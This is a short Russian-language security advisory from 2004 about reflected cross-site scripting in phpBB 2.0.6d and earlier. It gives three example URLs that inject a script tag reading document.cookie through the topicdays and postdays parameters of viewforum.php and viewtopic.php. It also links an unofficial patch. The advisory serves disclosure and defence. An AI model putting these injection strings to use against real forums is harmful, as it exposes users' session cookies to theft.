Security Lab

Межсайтовый скриптинг в phpBB форуме

Дата публикации:14.03.2004
Всего просмотров:2680
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: phpBB 2.0.6d и более ранние версии

Описание: Уязвимость обнаружена в phpBB в 'viewtopic.php' и 'viewforum.php'. Удаленный пользователь может выполнить XSS нападение.

viewforum.php?f=[FNUM]&topicdays=[DNUM][XSS]
viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&star t=30
viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20

URL производителя: http://www.phpbb.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Неофициальное исправление можно скачать отсюда: http://www.gulftech.org/vuln/phpBB2.0.6dfix.rar

Ссылки: phpBB 2.0.6d && Earlier Security Issues